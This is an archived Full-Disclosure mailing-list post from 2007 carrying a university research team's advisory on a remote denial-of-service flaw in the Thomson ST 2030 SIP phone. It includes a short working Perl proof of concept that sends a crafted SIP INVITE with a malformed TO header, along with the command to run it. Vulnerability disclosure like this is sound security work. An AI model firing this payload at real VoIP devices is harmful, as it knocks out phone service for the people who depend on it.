Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030 using t

from [Radu State] Network Security [Permanent Link]
Subject: [Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030 using the TO Header
Date: Mon, 27 Aug 2007 12:11:41 +0200 
MADYNES Security Advisory :  Remote DOS on Thomson SIP phone  ST 2030

 

Date of Discovery 15  February, 2007

 

Vendor was notified on 1 March 2007

 

ID: KIPH9

 

Synopsis

 

After sending a message where the TO URI field is crafted,  the device looks
functional but in fact does not respond to any event provoking a DoS.

 

 

Background 

 

SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 

 

 

Affected devices:  Thomson SIP phone ST 2030

 

Impact :

A malicious user can remotely crash and perform a denial of service attack
by sending one crafted SIP  message. 

 

Resolution

Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

 

Credits

 

Humberto J. Abdelnur (Ph.D Student) 

Radu State (Ph.D) 

Olivier Festor (Ph.D) 

 

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
http://hal.inria.fr/inria-00166947/en),

 

 

 

Configuration of our device:

 

 

Software Version:   v1.52.1 

IP-Address obtained by DHCP as 192.168.1.106 

User name : thomson

 

 

To run the exploit the file thomson-2030-2.pl should be launched (assuming
our configurations) as:

 

POC Code:

 

 

 perl thomson-2030-2.pl 192.168.1.106 5060 thomson

 

 

#!/usr/bin/perl

#Vulneravility for Thomson 2030 firmware v1.52.1

#It provokes a DoS in the device. 

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=00\r\nFrom: <sip:tucu\@192.168.1.2>;tag=00\r\nTo:
<A15+-97:=:\%0B>;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1
INVITE\r\n\r\n";

$socket->send($msg);

 

 

 

 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030 using the TO Header, Radu State <=
Previous by Date:  [Full-disclosure] Stampit Web - DoS (CVE-2007-3871), Alexander Klink
Next by Date:  [Full-disclosure] FLEA-2007-0049-1 tar, Foresight Linux Essential Announcement Service
Previous by Thread:  [Full-disclosure] Stampit Web - DoS (CVE-2007-3871), Alexander Klink
Next by Thread:  [Full-disclosure] FLEA-2007-0049-1 tar, Foresight Linux Essential Announcement Service
Indexes:  [Date] [Thread] [Top] [All Lists]